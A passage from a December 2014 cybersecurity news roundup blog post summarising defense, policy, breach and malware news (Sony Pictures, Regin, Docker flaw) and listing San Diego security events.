“Ash” Carter, has been a big supporter of increasing the country’s cybersecurity capabilities. His nomination signals that the administration is likely tocontinue to aggressively build out its ability to fight adversaries in the digital world. Carter served as the deputy secretary of defense from October 2011 to December 2013 — and before that spent two years as the Defense Department’s chief weapon and technology buyer. He first joined the Pentagon as a civilian program and technical analyst in 1981, working on missile defense.     How the Pentagon plans to bolster cloud security The latest installment in the Defense Department’s quest to find the right blend of security and affordability in the commercial cloud came in the form of a report released by the DOD CIO’s office. The report offers “cradle-to-grave” guidance for commercial cloud providers and DOD customers, acting DOD CIO Terry Halvorsen wrote in a prefacing memo. The report, “DOD Cloud Way Forward,” is the product of a 45-day study by Halvorsen’s office, the Defense Information Systems Agency and the National Security Agency. It contains three main proposals to help DODcustomers evaluate cloud security, with a central goal of cutting out unnecessary requirements for less-sensitive information and systems.     AHA to FDA: Hold med device makers responsible for cybersecurity Medical device cybersecurity should be the responsibility of device makers, according to the American Hospital Association. In a recent letter to the U.S. Food and Drug Administration, AHA Senior Vice President of Public Policy Analysis and Development Linda Fishman called on the agency to “hold device manufacturers accountable” for ensuring the safety of medical devices from cyberthreats. The letter was in response to a request for comments published by the FDA in late September on collaborative approaches for medical device and healthcare cybersecurity.     More on Sony Pictures Attackers Release Sensitive Data The attackers responsible for infiltrating the Sony Pictures computer network have leaked more than 40 gigabytes of stolen data, including compensation details for topexecutives, and a slew of passwords for computers, social media accounts and web services. The attackers claim to have stolen more than 100 terabytes of data. Despite speculation that North Korea was involved in the attacks, a more likely scenario is that they are the result of activists or disgruntled former employees.   Sony was in the midst of a changeover of chief information security officers when the company was hit with a crippling attack on its computer network .. [Note : From the wide range of data compromised, we may fairly conclude that Sony had NOT YET had the intent, design, time, or resources to apply the lessons that might have, should have, been taken from their own earlier breaches and those of others reported in 2014 but dating from months to years earlier.  The rest of us have little enough time to apply those lessons.  They include, but are not limited to, more compartmentation, true end to true end encryption on the enterprise network, fewer privileged users andmore multi-party controls, more structured data stored only on enterprise servers, controls (Active Directory) to resist access and gratuitous copies, and timely egress and other anomaly detection and mitigation….] The malware used in the attack against the Sony Pictures network can spread over network file shares and is capable of destroying data on Windows computers it infects. The FBI has sent confidential notifications to certain businesses, urging them to be vigilant about malware like that used in the Sony attack.     DOJ Establishing Cybersecurity Unit The US Justice Department (DOJ) is creating a new unit in its criminal division that will be focused on fighting cyber crime. “Prosecutors from the Cybersecurity Unit will provide a central hub for expert advice and legal guidance,” according to Assistant Attorney general Leslie Caldwell.     Always good to step back and see what others recommend as the best cyber posture..  These are a couple worth reviewing andimplement, especially the third – reduce security incidents by 85%with no added resources. DoD strategy for defending networks and data NIST SP 800-160, Systems Security Engineering: An Integrated Approach to Building Trustworthy Resilient Systems — National campaign to improve cyber hygiene  – with tool kits now      Navy’s information networks must be available, secure and capable of serving as warfighting platforms,    said the  head of Navy Cyber Command during a Dec. 2 event hosted by the Center for Strategic and International Studies.     Internet of Things on docket for new Congress The incoming GOP Senate majority is likely to focus on how the government regulates the growing universe of networks and connected devices.     No More FOUO: Government Plans to Simplify Labeling of Sensitive Information     ONE  comprehensive defense mobility strategy & policy     2015 Security predictions – websense What don’t we just FIX what we know needs it first…quit admiring theproblem and DO CYBER!     Information Security Salary Survey only 150 respondents, but…  CISO… well over 70% made over $161,000.. and climbing..     What Does All That Healthcare Data Really Mean?     Payouts average $2.9M per cyber loss claim for large companies     DOD CISO rattled off technologies he wants to help secure an Internet of stuff.     A new DARPA program wants to throw light on the dark alleys in computer systems where Advanced Persistent Threats and other attacks hide.     Google cloud remains price leader,         +++  FYI / FYSA   +++      Whitelisting project helps ICS owners find suspicious files – YES, & MORE – SO DO IT!!! Industrial control systems have been at the center of some scary security stories recently, but investigating malware infections in such environments isn’t easy because analysts often having a hard time telling good files from suspicious ones. Security researchers have identified two malware campaigns this year that targeted SCADA(supervisory control and data acquisition) systems — Havex and BlackEnergy. Such attacks are expected to grow in number, as new reports show that state-sponsored hackers are increasingly interested in critical infrastructure companies. A newly launched service called WhiteScope provides industrial control system owners and investigators with a list of good files from SCADA products and related software. The “whitelist” can be used to pin down potentially suspicious files when investigating possible compromises.     Cheap IT, dwindling maintenance leave Navy vulnerable to cyber threats The military has plenty of cybersecurity challenges on its plate as it is trying to ward off threats from unfriendly governments, unaligned hackers and criminal syndicates. But it’s not doing itself any favors by insisting on buying the cheapest possible equipment it can find to build and defend its own networks, the Navy’s top cyber officer said Tuesday. Vice Adm. Jan Tighe, who became commander of theNavy’s Fleet Cyber Command earlier this year, said that despite pressures on the overall budget, her service needs to reexamine the calculus it has tended to use up until now when weighing costs against security within its cyber systems. She framed the refocus as in- line with official military doctrine, which now stipulates that cyberspace is truly a warfighting domain, on par with and interdependent with the old-fashioned ones: land, sea, air and space.     Hardware secured mobile devices toughen first line of defense It’s been 10 years since the federal government introduced measures to standardize identity and credentials across all agencies. Since then, almost 5 million smart card-based Personal Identity Verification (PIV) credentials have been issued to government employees and contractors for secure access to government buildings and IT systems. Standards have also been widened for non-federal and commercial use to include millions more through Personal Identity VerificationInteroperable (PIV-I) and Commercial Identity Verification (CIV) cards. Aware of the potential offered by mobile devices, the federal government is now expanding the HSPD-12 standard in the form of FIPS 201-2, which enables credentials derived from PIV to be provisioned onto mobile devices so users can access applications and networks securely, quickly and easily.     Commerce takes bigger oversight role in tis bureaus’ cybersecurity For the first time ever, the Commerce Department is building a real-time view of its overall cybersecurity posture. And with that information, it’s taking on a greater oversight role over the 14 different agencies within its purview. Commerce officials emphasized that the establishment of a new Enterprise Security Oversight Center (ESOC) is not meant to be a takeover of the IT functions that have traditionally been managed by bureaus with disparate missions, ranging from the Census Bureau to the National Weather Service to the Patent and TrademarkOffice. Rather, it’s a recognition that the push toward continuous diagnostics and mitigation in the government only works if everyone’s sharing information – and if each agency is on basically the same cybersecurity footing.     Thoughts on NIST Draft Guide to Cyber Threat Information Sharing (SP 800-150)     Leveraging The Kill Chain For Awesome There are good reasons why the Kill Chain is being used by some of the most successful information security teams around. Here are three.     Why We Need Better Cyber Security: A Graphical Snapshot By 2022, demand for security industry professionals will grow 37%.   Also a great crime statistic infographic     The Real Cost of Cyber Incidents, According To Insurers Healthcare is hit by the most malicious insiders and the highest legal costs, according to a NetDiligence report. n August, the Ponemon Institute reported that security exploits and data breaches had cost survey respondents (some of which experienced multiple incidents), onaverage, $9.4 million over a year. Yet, according to research released today by NetDiligence, the average payout of a cyber insurance claim is only $733,109. full report       DISA takes on defense of DOD networks The initiative will create a Joint Force Headquarters for DOD Information Networks     POS Security Essentials: How to minimize Payment Card Breaches     Not Just the NSA: Privacy Breaches Closer to Home – In Short: Negligence and Privacy     Destructive Cyber Attacks on the Rise     The Millennium Falcon And Breach Responsibility     DoD To Silicon Valley, VCs: How ‘Bout Some Help!     Hiring R2D2 to Protect Your Mall or Campus, All for $6.25 Per Hour     Stopping Zero-Day Attacks With Secure Configuration Management (SCM / SIEM is essential – got one?)     Cyber liability: how can businesses protect themselves against underestimated cyber risks?     Penetration Testing: 5 Common Myths Explained     Advanced Cyber Defense Methods – eBook     the actualcost of failed trust..       4th annual benchmark study on Patient Privacy and Data Security. 2014     Privileged use abuse and insider threat     State of endpoint RISK           +++  THREATs  / bad news stuff / etc  +++     SSH and Next-generation vulnerabilities     Computing goes to the cloud. So does crime. As more of our world, from family photos to financial information, moves into the cloud, malicious hackers are following. It is easy to see why: Cloud computing systems contain lots of critical information, from sensitive corporate and personal financial data to government secrets and even nude photographs never meant to be shared. All of it has been targeted by hackers, and in many cases stolen. In 2009, a password-stealing “botnet,” or collection of malevolent software, was found inside Amazon Web Services, perhaps the world’s largest cloud-computing system. More recently, celebrities’ private photos were stolen from Apple’s iCloud storage system. IBM says itsresearchers regularly receive taunts from Russian hackers who leave them mocking messages in software aimed at stealing from the 300 banks IBM serves.     China, a fish barrel for cybercriminals In China, some of the most successful cyberthreats are frighteningly simple. One recent viral mobile message offered free Golden Retriever puppies to lure users into giving away personal information. Another online scam took thousands from a woman who wired money to an impostor she thought was her son’s teacher. A current favorite of Chinese cybercriminals, according to Pei Zhiyong, the senior security researcher of the antivirus company Qihoo 360 Technology, is to simply program malicious code that asks users to disable their antivirus software. “It will say their security program is incompatible with whatever they’re trying to do,” he said. “We call it a ‘Candy Trojan Horse,’ and 30 percent of users will actually respond by turning off their antivirus system.”     FBI warns of‘destructive’ malware in wake of Sony attack The Federal Bureau of Investigation warned U.S. businesses that hackers have used malicious software to launch a destructive cyberattack in the United States, following a devastating breach last week at Sony Pictures Entertainment. Cybersecurity experts said the malicious software described in the alert appeared to describe the one that affected Sony, which would mark first major destructive cyber attack waged against a company on U.S. soil. Such attacks have been launched in Asia and the Middle East, but none have been reported in the United States. The FBI report did not say how many companies had been victims of destructive attacks.     Malware Targets Password Managers     Mobiles to be among top targets of hackers in 2015     Tor secret comms – blocking reduces bank account takeover. A new report from the U.S. Treasury Department found that a majority of bank account takeovers by cyberthieves over the past decade might have beenthwarted had affected institutions known to look for and block transactions coming through Tor, a global communications network that helps users maintain anonymity by obfuscating their true location online.     Most U.S. Companies Under Cyberattack —–  Browser vulnerabilities are the most pressing security issue, study finds.     New POS Malware Discovered Just in Time for the Holiday Shopping Season         +++   SD/SoCAL security events / opportunities ++   CyberTECH events / networking / startups / etc  —  THE cyber happening place in SD!!!  Join their Meetup Group for the latest event information!   The definition of “Cyber KEWEL”     Webster University’s  new SD cyber security program – check it out..     DEC   16 – ISSA Annual elections and BIG prize raffle!!   AND Ira Winkler, President ISSA International     18 – ISACA chapter meeting –  (FREE!) Leveraging a Strong IT Audit and Information Security Partnership… BY Alex Branisteanu, Director Information Security,Scripps Health..  NEW LOCATION – Coleman University.     JAN   15 – OWASP – Running InfoSec for America’s Finest City..   Gary Hayslip, CISO for the city of San Diego,   28 – International Data privacy day –   all day event – “Securing the IoT Privacy masters”  CyberTECH, SOeC, others)   30  – Cross Border cyber opportunities – MX/TJ and CA/SD collaboration event, all day Friday!!! (Hosted at Coleman University) – Contact me to join in…   31 Jan – Tentative –   Started planning “BigDataDay 4 SD”  all-day event – free –   Jump in and help us! WE went to the one in LA and it was great…   likely our three tracks will be: (1)  Technical =  Hadoop / Hbase / NoSQL; (2)  Data science = predictive analytics, parallel algorithms, statistical modeling, algorithms for data mining, etc and (3)  Applications =  key use cases…  Privacy by Design / data security,  data start-ups / incubators, novel products,         ++  Future events in planning  FYI:   TBD  – Provided by IEEE Cyber SIG / VariousSecurity groups – all day – – Privacy by design workshop – a cyber model & why you must be part of this initiative!  (at Coleman University –  AM Technical approach… PM public discussions) Help move SD forward in cyber –  DOING security vs admiring the problem…. SO engage and help out on cyber 4 PbD!!! ++  Join our PbD / data security meetup, stay tuned into what’s happened.. See our over Cyber for PbD brief at AND Our more detailed technical paper on our Cyber 4 PbD approach, including an executable, proposed open privacy framework within an enterprise architecture is at (this rough draft is also getting ready to be published in a major IEEE magazine in Jan 2014):     —————————————————————————– DEC 2 The 10 Most Profitable Industries According To Big Data     Security performance of S&P 500 companies in four key industry sectors: Finance, Utilities, Retail and Healthcare     Government types – Updated SPAWAR Acquisition Forecast can be found at     10 top security threats of2014 (so far) The top security threats of 2014 include equal parts old mistakes, new adversaries, innocent human nature and the evils that people do. for 2015.. more of same…poor cyber hygiene (poor patching, weak procedures, etc)   weak access control (not enforcing least privilege), as always –  people / users,  applications w/o security, retailers lax security controls, android security, IoT, et al.. Websense 2015 Security Predictions Report     Top 100+ Cyber Security Blogs & Infosec Resources     SANS 2014 Security Analytics & Intelligence Survey Good overview of security and data…     Infographic of 200+ Startup Resources in San Diego     Very useful list of URL web site addresses supporting  the SBIR/STTR program   Forms, audit, OCI, grants, etc…         +++  Cyber Security News you can use  ++   FedRAMP developing a FISMA high baseline in 2015 Demand is finally pushing the cloud services cybersecurity program known as FedRAMP to develop standards for high impactsystems. The Federal Risk Authorization and Management Program will send a draft baseline standard for FISMA high systems around the government for comment in the next month. Matt Goodrich, the acting director of the FedRAMP program, said the program management office then will submit the draft baseline to industry for comment before finalizing it in 2015.     Newly revealed cyber espionage attack ‘more complex’ than Stuxnet, Flame &  now Regin First there was Stuxnet and Flame, and now there’s an even more sophisticated, stealthy, and powerful cyber espionage attack called Regin that dates back as far as 2003 and has been found infecting machines in more than a dozen countries. Symantec and Kaspersky Lab have each published their separate findings on Regin, a modular malware platform that has targeted Windows machines in telecommunications operators, governments, financial institutions, researchers, governments, small businesses, and individuals associated with cryptographyresearch. What we know about ‘Regin,’ the powerful malware that could be the work of NSA AND     NSA director: “Totally defensive” a losing strategy Although there are no established principles for norms in cyberspace, such as what qualifies as an “act of war,” the idea that nations should refrain from offensive action and operate day-to-day completely on the defensive is not acceptable to the U.S. military, said Vice Adm. Mike Rogers, the dual-hatted head of the National Security Agency and Cyber Command. “Being totally on the defensive is a very losing strategy to me. It will cost a significant amount of money. It leads to a much decreased probability of mission success. That’s just not a good outcome for us in the long run,” said Rogers during a Nov. 20 hearing before the House Intelligence Committee.     A tool to know if you’re being watched Want to know if someone is spying on your computer? A coalition of privacy and civil liberties groups this week released a free tool,dubbed Detekt, that searches for surveillance spyware on your computer. The spyware might be collecting emails, listening to Skype video calls, observing through a computer camera, or even monitoring keystrokes to determine passwords and Internet activity. Designed for journalists and human rights organizations – the subject of intense government scrutiny in many countries – the tool works for anyone with a Windows computer.     As cyberthreats increase, big money chases patches The year since hackers broke into Target and accessed millions of credit and debit card numbers has been a brutal one for cyberattacks. Next year’s threat forecast doesn’t look any better. But for cybersecurity firms and companies offering cyber-insurance, the year has been great. Business is booming and stock prices are shooting upward. Security start-ups are also getting a massive boost in funding. The hackers that infiltrated Target’s point-of-sale terminals sometime before Black Friday last year were ableto steal as many as 70 million credit and debit card records. That, it turns out, was just the beginning. Twenty major U.S. retailers have been breached so far this year, according to data from the security benchmarking company BitSight.     Security Checklists Useful as Part of Larger Strategy Lists of top vulnerabilities to look for and address are helpful, but only when used as part of a larger overall strategy. Each organization needs to use the list to complement its own risk assessment practices.     NIST – Guide to Cyber threat information sharing Some great info in areas.    ExSumm overview points    2.2 – challenges    2.3 – cyber kill chain   2.7 – recommendations..   and most of Section three, especially  3.4, self-assessment.   Appendix D is great – lots of good resources and links!       The catastrophic state of security in 2014 Pretty good / sometimes humorous looks at four key problem areas…(don’t agree with some)     Why We Need Better Cyber Security: AGraphical Snapshot By 2022, demand for security industry professionals will grow 37%.  Some great statics too..     DLP remains high on the list of cybersecurity policies Data loss prevention (DLP) has been a part of Internet security almost as long as the Internet has existed. Sometimes, though, it seems like old hat, a not very cool older uncle that is irrelevant in the face of other, sexier security solutions. But as recent high-profile events have shown, it still needs to be the focus for most organizations     How the Pentagon plans to bolster cloud security A new report from the DOD CIO offers soup-to-nuts guidance on security for commercial cloud providers and Defense Department customers.     Network Security Needs Big Data | ZTM (zero trust model)     A computer-vision algorithm that can describe photos     NSA Technology Transfer Program / Catalog       Applying the 20 Critical Security Controls to the Internet of Things (IoT)..  Good mapping..     Short-RangeLow Power Wireless Devices and Internet of Things (IoT) and     The Dark Side Of Wearable Tech: Should You Be Worried?     17 New Trends in Big Data and Data Science           +++  FYI / FYSA   +++     Speeding up breach detection On average, organizations take 229 days to detect a data breach, according to a recent study from the online security firm FireEye. One reason for the lengthy detection time is two-thirds of organizations are told about a breach by a third party, rather than discovering it themselves, says Dave Merkel, Chief Technology Officer at FireEye. “It’s the FBI showing up with your ‘wallet,'” he says. “Or even worse, your customer shows up [to tell you about a breach].” Organizations looking to speed up breach detection on their own, rather than relying on others, need to improve their data analytics capabilities, prioritize the type of data they want to collect and analyze, and ensure they have the appropriate staff who can take the time to review the data forsuspicious activity.     U.N. urges protection of privacy in digital era The United Nations adopted a resolution on Tuesday urging all countries to protect the right to privacy in digital communications and to offer their citizens a way to seek “remedy” if their privacy is violated. Though not legally binding, the resolution signaled growing international attention to the issue of digital privacy, which it described as a human right. The measure passed by consensus in the General Assembly’s human rights committee, which meant that it was not put up for a vote. But it was a result of intense closed-door negotiations, and it set the stage for a showdown in Geneva next spring, when the issue is expected to go to the Human Rights Council. Privacy advocates are pushing for the United Nations to establish a special envoy.     Derived credentials to roll out across DoD by July 2015 Personnel in the Department of Defense Office of the Chief Information Officer are piloting the use ofderived credentials to send secure emails on their mobile devices without having to go through the added steps of plugging in an authorized common access card (CAC), a system that could be rolled out across the component agencies by this summer. Placing credentials on a user’s mobile device – derived from their CAC – enables use of authorized personal identity verification (PIV) for secure communications without forcing the user to plug in a sled (extraneous device) to read their CAC.     Symantec uncovers sophisticated, stealthy computer spying tool Computer security researchers at Symantec say they have discovered a sophisticated piece of malware circulating the world that appears to be used for spying at Internet service and telecommunications companies, and was likely created by a government agency. And while its origin is unclear, a short list of capable countries would include the U.S., Israel and China. The research, published today, comes from the same team at Symantec thatfour years ago helped discover and ferret out the capabilities of Stuxnet, the world’s first digital weapon. It is believed to have been created by the combined efforts of the U.S. and Israel and used to sabotage the Iranian nuclear research program.     NIST Weighs Pros and Cons of Cyberattack Data Sharing To facilitate more and faster information sharing around cyberattacks, the National Institute for Standards and Technology (NIST) released a draft document Monday outlining some best practices.     NIST – Guide to Cyber threat information sharing – Solid ExSumm overview points ..   2.2 – challenges..   2.3 – cyber kill chain…   2.7 – recommendations and most of Section three, especially  3.4, self-assessment… Appendix D is great – lots of good resources and links!     The Week When Attackers Started Winning The War On Trust The misuse of keys and certificates is not exotic or hypothetical. It’s a real threat that could undermine most, if not all, critical security controls, asrecent headlines strongly show.     Cybersecurity, the Internet of Things, and the Role of Government     The top cloud computing threats and vulnerabilities in an enterprise environment     Testing the Security of Smart Devices with the OWASP Top Ten     GAO Report on VA Information Security     Liberty Mutual Offers Cyber Insurance Coverage for Small, Mid-Sized Businesses     Digital Storage And The Internet Of Things     NSA Releases New Data-Flow Software to the Open Source Community     Cyber Defense Plan of USAF     10 hottest IT skills for 2015     The Ten Commandments of Counterintelligence   Amazon embraces docker     Deconstructing the Cyber Kill Chain     Private Cloud Security Considerations Guide..     Five great browser add-ins to protect your privacy           +++  THREATs  / bad news stuff / etc  ++     Now e-cigarettes can give you malware E-cigarettes may be better for your health than normal ones, but spare a thought for your poorcomputer – electronic cigarettes have become the latest vector for malicious software, according to online reports. Many e-cigarettes can be charged over USB, either with a special cable, or by plugging the cigarette itself directly into a USB port. That might be a USB port plugged into a wall socket or the port on a computer – but, if so, that means that a cheap e-cigarette from an untrustworthy supplier gains physical access to a device.     Docker security flaw found The Docker Linux container format has a major exposure that could allow malicious code to assume unassigned privileges with the host server and order the extraction of files that are not intended to be accessible to the container’s code. Several generations of the Docker container formatting system are subject to the vulnerability; only the latest version, Docker 1.3.2, is exempt. There’s no way to patch the thousands of copies of Docker with release numbers before the 1.3.2 release, according to companyrepresentatives — the only safeguard is to upgrade to the recent release.     As hackers hit consumers, retailers keep quiet about security As the holiday buying season approaches, retailers remain open to the same attack – called a “point of sale” attack – that hit Target and Home Depot, security experts say. Those analysts say that retailers have their fingers crossed, hoping they’re not next. And leading companies are keeping very tight-lipped about what, if anything, they’re doing to protect customers. It’s easy to spot a scratched face on a watch. It’s much harder to tell if the checkout machine that you swipe to pay for that watch is defective. But Davi Ottenheimer knows how. He’s a security researcher at EMC, a Hopkinton, Mass.-based data storage company. He’s been auditing retail for a decade. And we’re looking at how “hackerproof” stores are this holiday shopping season.     6 million+ email accounts worldwide exposed in past 3 months More fallout from the epidemic of databreaches that occurred in 2014: More than 6 million email accounts and credentials from around the globe have been leaked in the past three months, according to a new study. Putting that into perspective, the researchers who gathered that data from the cybercrime market say they typically see around 150,000 such pilfered accounts per month. “This explosion can only be connected to the high number of data breaches that occurred in 2014,” Heimdal Security said in a blog post warning of the surge in stolen email account credentials.     Cybersecurity was missing in action on Election Day In the run-up to the recent election, there were many discussions of issues like the Islamic State in Iraq and Syria (ISIS), immigration, the Ebola virus and the Keystone XL pipeline, just to name a few. The one area missing from the pre-election dialogue: a serious discussion about cybersecurity. Perhaps this was because discussions on cybersecurity can quickly turn into arcane discussions of technicaland policy minutiae, and candidates are incessantly advised by their handlers not to provide detailed positions on anything – to eschew the minutae in favor of the time-tested political platitude. The bumper sticker slogan always beats the well-reasoned complex argument in American politics.     The Largest Cyber Attack In History Has Been Hitting Hong Kong Sites The largest cyber attack in history has been carried out against independent media sites in Hong Kong over the past few months.     Masque Attack: All Your iOS Apps Belong to Us FireEye mobile security researchers have discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the samebundle identifier.     The 10 Biggest Bank Card Hacks     Underground Markets Online: Criminals Test Stolen Card Data on Charity Websites     The top cloud computing threats and vulnerabilities in an enterprise environment     Nearly half of all web application cyber attacks target retailers     Your Wi-Fi’s WPA2 Encryption Can Be Cracked Offline: Here’s How     ‘Most advanced mobile botnet EVER’ is coming for your OFFICE Androids     U.S. Gov Insists It Doesn’t Stockpile Zero-Day Exploits to Hack Enemies For years the government has refused to talk about or even acknowledge its secret use of zero-day exploits to hack into the computers of adversaries and criminal suspects. But this year the Obama administration finally acknowledged what everyone…           +++   SD/SoCAL security events / opportunities ++   CyberTECH events / networking / startups / etc  —  THE cyber happening place in SD!!!  Join their Meetup Group for the latest event information!   The definition of “Cyber KEWEL”     Webster University’s  new SD cyber security program – check it out..     DEC   16 – ISSA Annual elections and BIG prize raffle!!   AND Ira Winkler, President ISSA International     18 – ISACA chapter meeting – Leveraging a Strong IT Audit and Information Security Partnership… BY Alex Branisteanu, Director Information Security, Scripps Health..  NEW LOCATION – Coleman University.     JAN   15 – OWASP – Running InfoSec for America’s Finest City..   Gary Hayslip, CISO for the city of San Diego,   28 – International Data privacy day –   all day event – “Securing the IoT Privacy masters”  CyberTECH, SOeC, others)   30  – Cross Border cyber opportunities – MX/TJ and CA/SD collaboration event, all day Friday!!!  (Hosted at Coleman University) – Contact me to join in…   31 Jan – Tentative –   Started planning “BigDataDay 4 SD”  all-day event – free –   Jump in and help us! WE went to the one in LA and it was great…   likely our three tracks will be: (1)  Technical =  Hadoop / Hbase / NoSQL; (2)  Data science = predictive analytics, parallel algorithms, statistical modeling, algorithms for data mining, etc and (3)  Applications =  key use cases…  Privacy by Design / data security,  data start-ups /incubators, novel products,       ++  Future events in planning  FYI:   TBD  – Provided by IEEE Cyber SIG / Various Security groups – all day – – Privacy by design workshop – a cyber model & why you must be part of this initiative!  (at Coleman University –  AM Technical approach… PM public discussions) Help move SD forward in cyber –  DOING security vs admiring the problem…. SO engage and help out on cyber 4 PbD!!! ++  Join our PbD / data security meetup, stay tuned into what’s happened.. See our over Cyber for PbD brief at AND Our more detailed technical paper on our Cyber 4 PbD approach, including an executable, proposed open privacy framework within an enterprise architecture is at (this rough draft is also getting ready to be published in a major IEEE magazine in Jan 2014):   ​  

December 6th, 2014 | Category: